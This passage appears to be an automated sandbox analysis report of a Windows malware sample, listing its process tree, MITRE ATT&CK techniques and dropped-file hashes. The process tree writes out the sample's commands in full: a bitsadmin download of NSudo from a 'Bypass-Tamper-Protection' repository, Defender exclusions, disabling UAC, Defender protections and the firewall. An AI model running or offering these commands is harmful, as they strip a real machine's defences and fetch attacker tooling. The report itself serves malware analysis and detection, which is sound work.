C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:3484
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs2⤵PID:2060
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe2⤵
- Download via BitsAdmin
PID:3792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force2⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5008 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3020
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
152B
MD52ee16858e751901224340cabb25e5704
SHA124e0d2d301f282fb8e492e9df0b36603b28477b2
SHA256e9784fcff01f83f4925f23e3a24bce63314ea503c2091f7309c014895fead33c
SHA512bd9994c2fb4bf097ce7ffea412a2bed97e3af386108ab6aab0df9472a92d4bd94489bb9c36750a92f9818fa3ea6d1756497f5364611e6ebd36de4cd14e9a0fba
-
Filesize
152B
MD5ea667b2dedf919487c556b97119cf88a
SHA10ee7b1da90be47cc31406f4dba755fd083a29762
SHA2569e7e47ebf490ba409eab3be0314fa695bf28f4764f4875c7568a54337f2df70f
SHA512832391afcac34fc6c949dee8120f2a5f83ca68c159ff707751d844b085c7496930f0c8fd8313fd8f10a5f5725138be651953934aa79b087ba3c6dd22eaa49c72
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD5db2b89dd4b1fd9cfc8fadb5046ebe67b
SHA134eaf971922351327fcd802fc89eececcdc9febe
SHA25606c5e271e2186d2942bccd2d7b4473ee686ad8f7ffb54b7c7074706a696c4e55
SHA51258ffd46fae05dd9a3dfc5b9fe4a7ead5c6659eefa8673faf38d24383f8e2e89bd9f3b5064d1b48ba5837472128fe46de972e5d93d2c0ecaa1f77da7593842532
-
Filesize
2KB
MD5c863a889456175015e3b84781b82d90a
SHA1becee9f4ad233f01bf3055d8d71a6cba8f858594
SHA25667b6119bb093fc2f80352fe044b33b799a3d3e030981fe896f8cdb03140f0f91
SHA512745c5a6b231aaac1f71d2cc379e54ad009a02c7d57b5c3427f14b531991a8373f585e347acea4415da61956f7e8e266d863c3dec2b6d71f3ad2d5ea36e3b895f
-
Filesize
5KB
MD52a611e8b405da657d669ad90231ba583
SHA18703e98403b2e0bc58d0132cfd50bc9a28352883
SHA256794d26641f66b73816c67f6064af5b776a273d0a7aea2f46b7c7756be8d3c335
SHA512ec9a39c76b542ff1790793eacc44dd376d5c33124358a1eacac74adc450121189a02448f9bdcb57d30597d64560173486d461a4da9ed034f3208c05d7d1ddffb
-
Filesize
7KB
MD5ed5358530afa92987e6a924f110e0989
SHA1a55ab1627e57e05b7ee754e86b83f6e30ed79a77
SHA25600054ddc6e655e0cbcfe7cf2287e095faa66fc042da6679aabd5b10194a36765
SHA512ae7f1d0cbd504892c0e502814939d89753214008c6670878f63fdf8728f5074134a735e2d76389986e28341f0520275a7999ba4e43a2160f90d9d88d26e9168b
-
Filesize
7KB
MD5eef35a099322a43dbcc347f04ce3b1bf
SHA16052674ba2ec8f0052596ae6bc7ef198a02e3d4a
SHA256385d206f0a70a81b0dfa1ee8b9c118ef8894dd64f3dca06299291464dbb013d2
SHA5127856447fca3d2dbdb0e55e7c5fc62fd18cd2d06c02c04b825539b2dc3d2895c91bd92327e54dcb2d7704c4ac204f279f38c506dfe64f715f7481d3443c1ce831
-
Filesize
6KB
MD5d525e402ee24d4fc30dc3e4e75e52efb
SHA112517d3ab3b3cc2e659799a8a2792c0fc0a835d8
SHA256e18e6d106b8cd00b79bc614c58669c6350fe1e7f78d6d884fac5284906f6ebb2
SHA51252a0ec08697a4ba96b0761e9f5a24f933cc32e45a64894a62f7e046ff6740e820b0b836346714d992cab99cb831a3a8dbbcad80036ccd110b1abc6793482d73b
-
Filesize
2KB
MD538f7f4879c51009dc9f84850057aebe4
SHA14443b852f7c6b315a71769b11c9e28ee015f1fc8
SHA2563aba0921b6c296f0810a627b591da9b7b4990a3a31c1d1f637498fe1e68797af
SHA5129c243b3bb7d51e53d4f7fa94d4dceeda4105e984a0c3c7897903ca1b34c95ba8542be3f7435fa80d74bea928ff0d8886ff42347e0fd0e0ad36857a0177fe4251
-
Filesize
2KB
MD5d4c9c8c28ba4a1155b1183a610c51633
SHA17d27385a86f57b9a41a51b1657cc0905ee60ab14
SHA2563fbd2a1d6753401fd407c1c68a7876b6a2700d70c26b13154d261402bd5d4aab
SHA51272bf696674e1d0bc6295f12af2df0e4799b3f0f61cf9ed149301f884b9c24efe5397c1f7cdb35d974f114f99bd123d16c938f96113caefaa3e7494a304543e92
-
Filesize
539B
MD501b76bb2ef606eacdeeb226c93018d99
SHA11d23e471c7740ecdd72cfd6ce23ae693ada71162
SHA256e719fc5838b244f500c027f066592fcf3d48a40efbb647aa121112560942ebca
SHA512d59fa864b40d377004daa237c6287635123c9e1b749daf643d9ebead55b35fc93c017140a97f469b5bdc18947c84e8161253e485eb2e36e63f45427ec0254932
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5ae1297bd78a96151a31441b7c0b739c5
SHA1f51e426fa24c4a5110c1b0fa97764054445f3510
SHA256cfd85495b4777cdcca0c25477dc0fd005ce2b1ff9f2358ae927b4d0b745f5355
SHA512bae8b86bb971a433615ece0884ee8d08288de08bf250516d4e4efd1f3aaa68844169d072cdf60399e8b482805f5c851a420e23c8ad5c2849769433a4167e101f
-
Filesize
11KB
MD5ab3d55530efeef3c5d17ce9e9b7aa25a
SHA196f5eb5875a1d192e5a3e9a3ea3b6b100c9c593c
SHA256c0203ebe193aed3d73756558698dfe9c86a2d2863d5b126bda7011ae9710026c
SHA5121bebd1a58010a77f396a6697f4d9aa8adb1be8087c885b41aad572763c087dc3b7174a167319b5fd9cc272e1617bcba90b0d75bdb3a7c672402e1dac5554e940
-
Filesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize
64B
MD5052b68d98977d4f52cc6afabfa743b06
SHA163b671a71cc5ec6b76218b0094784a5e21e08e7f
SHA256199ac916bb90b9b2107eb749d5c65411c387c7d59f0a2d19d17674983287116a
SHA512e20517e1d3b755c17c617f9cbab3de19a4b29fc16a3422bbde30530130c2865173b85ee24e336b20c4706740250bc062f789d0c6989d4ed15c6f8527033693af
-
Filesize
1KB
MD5ea292e0d870c21833e86a33dbdbeb4b5
SHA11d4ea5bf2aa655df1a7dfe1542e8a0c11b10410b
SHA256b06ce1c537b90fb95d640ec13aee0cccd4fcf225e2dde619cb3ac3def3ea8e78
SHA512d6a7eb9de74196491f1f81cef9273b3259ffd2be51b68e17dd2fb336a7543b385ebe6d95cd57aeae9296395a51a8e3446ba14a2b8b938ab745d7df5c8e1deae2
-
Filesize
944B
MD5d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA25621942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA5121a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize
944B
MD580707036df540b6657f9d443b449e3c3
SHA1b3e7d5d97274942164bf93c8c4b8a9b68713f46f
SHA2566651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0
SHA51265e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f
-
Filesize
948B
MD575750301db717dee0ddce4939072ec41
SHA1d4a763f4ced8ff5be9df24e0d6ec676a7a080527
SHA256abfcadfc1dab687291dec5402f5472132f4d2460e85a498a37efa5ac9dc09888
SHA512e02fbfc783aeb85a16422baf6df381b88415a89a29316695e48c1edb65745ec801759e276803207645d59b81e3ad38f584caad824772035ee6ce46c333f75ce3
-
Filesize
948B
MD52afc7f8f972d80c756469f519957ebe3
SHA1a2b08d1c68d7c26f52784aa22c1c02cf73453c4a
SHA256fc8adf84ff2cdbcb64cfbe3e035b9d4286fa1169b052139c168393970bee86bf
SHA5124d4a28cc652d1c57ebb92670f3474d41c645b3993086d9d132fb23444bbde4382993b50b2d4c919a5ab7307d53c770ad9869397ec5213eddfa84db2da0d1556e
-
Filesize
948B
MD5eb6bbad04121efc4b28aafcfb2098c9b
SHA1874882a3749c41301505e95510f761491c465073
SHA256bdd1eb4ef60661fd7570aa4f6454ffe1072f57d213dd7263f89dafceee0e5bd5
SHA5127ade89430b42f124403449f4b8146ea4daad3bf87a53fe6aacdb28d759ad759ad6ea88db61723c1fa9c728d0d3c7aafa13527d15cf7149abbb4fa4fb4eb459d3
-
Filesize
948B
MD5b6c336e3b3cb2cd04d42baac1aa4aa0d
SHA135a943816f3e9cd596e91be92c4bdb1b05a42d88
SHA2564518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60
SHA51242c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4
-
Filesize
948B
MD567fc27fc887b927aeb2ff531b04c3c84
SHA1a001b354b8d636a64ee2a519ca19dafb8e744a16
SHA256a7ca81c6ea294d3450336418c895ab1774bd959e6b79b62716849e8c4607c25d
SHA5128c8eab70b6c5d0bbbc78760b25ea6deb7d4221d03a6f680999f4cd02da330c1cc14b6c0a5e8e4f0ac5295d037fe7e71932360f552db85bc8bbe2e9dea30f23b6
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
944B
MD5fcbfea2bed3d0d2533fe957f0f83e35c
SHA170ca46e89e31d8918c482848cd566090aaffd910
SHA256e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38
SHA512d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6
-
Filesize
64B
MD555d46f537381013a3b35f9ac7b1ca381
SHA13b6aed0a4b83bbcff9a4830ef36c050f1e5e9605
SHA256f6e691fcc8f75da2a6c49f28d5db50699b5402bd9bde6a3d726a47a8a1a54e89
SHA5124447f51dd568f973c83ebc192f887e2447322947015c8d21d3218ec3ef86084099dc583b359effd9b733efee9f1c0dca6544a1f7531d7080476e570662081d4a
-
Filesize
944B
MD549c39329e38937c8e27f09fadb70c0f7
SHA1958c29d3bbb82b4c85162e70d0a96d8c6f389283
SHA2561a6a068d88a05119fc303cb10a417b655b243a1a3d9f89461aa51d97b9f99206
SHA5121405b839ad6be92d81004c736592df210e97f44dbb4f0c63779370eabb1a04d8c663eb55c3de3f189e34d35446c08809af7555c881a86fd3b85fcdf544a8cbd1
-
Filesize
948B
MD5a0e27123ec2730bd5d89828fd6a41cc2
SHA1d1099e93025598a470d6cc9c0549595e8f8e9a7f
SHA256fda70f35a9cbde9e93461cd72d0c668f964d8b07e5c43322e47ed602ceb177a9
SHA512b73fba4357362fa2057fe5216490da71958e1edb6fd08fe7cd99d214a8a1a5381ff304584c7969cedfb790170ecd65cbe96e006c5d2e41ceff587138ba244d31
-
Filesize
948B
MD5d70b0a49b2727a97cc322ea54d2a66c7
SHA157d984bd970307ad80665d97f5369ad644de8776
SHA256bc38ea6605142cb9ec440231b665a5c5a53c499c7e25a77a94eb6491efdd2a65
SHA51290790e506f7453a63d4915fb50c7694184c3bc5b836979d19c15a240c6145d9bbc33d393007f4b39a782e789f6259974a1824e79e960a64c5f8703e4797fdd0d
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD53e1f5eeae74491d8850ef2c8b03a9a3b
SHA10c02c9c2550107de6dd0eb740ac5668f292883c0
SHA25666756c0edf3925de7bcb685385e2a4f0b854cffd796a9e90eb1ed064b1fb0e30
SHA5127637f0807d88dbceeb68823a044583e2248ac1ba73c000da6560f94075635a27d15970df7e52f8315bdc2f1c45cff6f1ab7690e916b58307a533f8df24329c2a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
112B
MD59313d55e26ad30ddcbc046fe8013a21d
SHA1a5712ce8864d7b0ca88b94c64226dfeb2221457f
SHA256121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a
SHA51277b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7
-
Filesize
307KB
MD51d23efd21f4e61e620c7be5d70c66903
SHA13f7b34380e10912c6aaed833b378392a57d22b49
SHA2569a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe
SHA5124a657cc7ba2ed904c0742b504a0bdc685fb1c69b345ea9aef928ff0c2710fd17af42ca4d79d8055588372b43b9e953ff99ab4dea7ce07bbaf733f1b2a7495f46
-
Filesize
181B
MD5affda83f3fadf6044e5c68100e9ed3f9
SHA171da30cbb01d3bee4028d333d61cf0dc72be67d6
SHA25693ead31dd979c1a0627a4fc8a1a690d6a1a22b647d4a61487ccb88fdbe035da6
SHA512db0b78824f31505cb176a9bc7a71bd67cbce617cb6a599dfd25be9e9173dacba8363de09f4bbd96c46b67d1027d9a5065bf08a1f2a39f06c6f0cec2986ed0a9f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e